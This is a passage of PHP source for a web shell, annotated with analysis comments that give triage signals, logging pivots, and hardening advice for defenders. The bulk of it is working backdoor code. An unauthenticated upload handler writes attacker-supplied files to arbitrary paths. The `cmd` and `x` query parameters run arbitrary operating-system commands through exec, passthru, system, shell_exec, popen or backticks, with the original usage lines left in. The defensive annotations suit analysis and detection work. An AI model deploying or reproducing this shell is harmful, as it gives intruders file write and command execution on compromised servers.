SERVER OS: {$os}
DISABLE_FUNCTION: {$df}";
/*
 * [Analysis note] File-drop handler of a web shell, selected when the query
 * string carries req=upload. No credential, token or origin check is visible
 * in this excerpt.
 *
 * Triage signals taken directly from the code below: a POST to this script
 * with ?req=upload, a form field `_upl` equal to "Upload", a form field
 * `path`, and a multipart file part named `f`. On success the response body
 * contains "true: " followed by the path that was written.
 *
 * Containment: writable directories that do not execute PHP, plus
 * file-integrity monitoring on the web root, limit what this handler achieves.
 */
if($_GET['req'] == 'upload'){
/* uploader usage: target/?req=upload */
/* Attempts to switch off output buffering; "@" silences the diagnostic if the call has no effect. */
@ini_set('output_buffering', 0);
/* NOTE(review): the next two literals hold only a line break / nothing; the page markup they presumably carried looks lost in extraction. */
$outs .= "
";
$outs .= "";
if(isset($_POST['_upl']) && $_POST['_upl'] == 'Upload'){
/* Scheme is inferred from HTTPS or the X-Forwarded-Proto request header. */
$webprotocol = isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1) || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https' ? "https://" : "http://";
/* $urlweb is built from the Host header and PHP_SELF and extended below, but it is never written to $outs in the lines visible here. */
$urlweb = $webprotocol . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']);
/* Destination directory comes verbatim from the request body. */
$pathx = $_POST['path'];
$lawlx = @$_FILES['f'];
/*
 * The target is <request path>/<client-supplied file name>, with no basename(),
 * extension or content check, and copy() is used rather than
 * move_uploaded_file(). The result is a write to any location the PHP process
 * account may write to. "@" keeps failures out of the PHP error output.
 */
if(@copy($lawlx['tmp_name'], $pathx."/".$lawlx['name'])){
$urlweb .= '/'.$lawlx['name'];
$outs .= 'true: '.$pathx."/".$lawlx['name'].'
';
} else {
/* Second attempt with file_get_contents()/file_put_contents() when copy() fails. */
$upfiles = @file_put_contents($pathx."/".$lawlx['name'], @file_get_contents($lawlx['tmp_name']));
if($upfiles){
$urlweb .= '/'.$lawlx['name'];
/* Reports success only if the file is actually present afterwards. */
$outs .= file_exists($pathx."/".$lawlx['name']) ? 'true: '.$pathx."/".$lawlx['name'].'
' : 'false
';
} else {
$outs .= 'false
';
}
}
}
/* Emits the accumulated output and ends the request, so nothing after this branch runs. */
echo $outs;
die();
} else {
/**
 * [Analysis note] Web-shell helper that hands $str to the operating-system
 * shell and returns whatever the command printed.
 *
 * Selection is an if / else-if chain over exec, passthru, system and
 * shell_exec: only the FIRST name for which function_exists() is true is
 * considered. If that name is listed in the disable_functions ini value, the
 * inner check fails and control leaves the chain without a return statement,
 * so the caller receives null; later candidates are not tried. popen() is
 * reached only when none of the four names exists, and it is not compared
 * against disable_functions.
 *
 * Defender view: every branch makes the PHP worker spawn a child process, so
 * shell or utility processes parented by the web server / PHP worker are the
 * host-side signal. Hardening note: popen is a fifth primitive here, so a
 * disable_functions policy should cover it as well as the four named functions.
 *
 * @param string $str Command line, passed through unmodified; the call site in
 *                    this file supplies request data.
 * @return string|null Command output; the fixed fallback message when no
 *                     primitive is usable; null on the fall-through described above.
 */
function execute($str){
/* Reads the runtime's disable_functions list and splits it on commas (entries are not trimmed). */
$disfunc = @ini_get('disable_functions');
$disfuncs = !empty($disfunc) ? explode(',',$disfunc) : [];
if(function_exists("exec")){
if(!in_array("exec", $disfuncs)){
/* exec() fills $out with one element per output line; the lines are re-joined with "\n". */
@exec($str, $out);
$out = @join("\n",$out);
return $out;
}
} else if(function_exists("passthru")){
if(!in_array("passthru", $disfuncs)){
/* passthru() writes straight to the response, so an output buffer captures it instead. */
ob_start();
@passthru($str);
$out = ob_get_clean();
return $out;
}
} else if(function_exists("system")){
if(!in_array("system", $disfuncs)){
/* Same capture technique as the passthru branch. */
ob_start();
@system($str);
$out = ob_get_clean();
return $out;
}
} else if(function_exists("shell_exec")){
if(!in_array("shell_exec", $disfuncs)){
$out = shell_exec($str);
return $out;
}
} elseif(is_resource($f = @popen($str, "r"))){
/* Last resort: read the process pipe in 4096-byte chunks until end of stream. */
$out = "";
while(!@feof($f))
$out .= fread($f, 4096);
fclose($f);
return $out;
} else {
/* Runtime string, left as written: Indonesian, roughly "can't run the command, sir". */
return "gak bisa jalanin perintah pak!";
}
}
/*
 * [Analysis note] Request dispatcher for command execution. Two entry points,
 * neither guarded by any authentication visible in this excerpt:
 *   - cmd : run through execute() and echoed after a "~$ " prompt.
 *   - x   : run directly with the backtick operator.
 * Both branches are keyed on $_GET, so the command text travels in the query
 * string and normally lands, URL-encoded, in the request line of web-server
 * access logs. `cmd=` or `x=` parameters on a script that should take none are
 * a practical hunting pivot.
 */
/* command usage: target/?req=&cmd=uname%20-a */
if(isset($_GET['cmd']) && !empty($_GET['cmd'])){
/* Assigned from $_REQUEST but not used again in the lines visible here; the value executed below is $_GET['cmd']. */
$command = $_REQUEST['cmd'];
/*
 * Builds "~$ <command><output>", backslash-escapes CR, tab, backslash, single
 * quote and NUL, then passes the result through a UTF-8 to UTF-8 iconv() call.
 * NOTE(review): the iconv() round-trip presumably guards against invalid byte
 * sequences in command output; confirm. Nothing here HTML-escapes the echoed
 * command or its output.
 */
$out = @iconv('UTF-8', 'UTF-8', addcslashes("~$ ".$_GET['cmd']."".execute($_GET['cmd']),"\r\t\\'\0"));
echo $outs . "
" . $out . "
";
die();
} else if(isset($_GET['x'])){
/* The backtick operator runs its contents through the shell (same as shell_exec()); this path does not go through execute() or its disable_functions check. */
echo `$_GET[x]`;
die();
}
}
}?>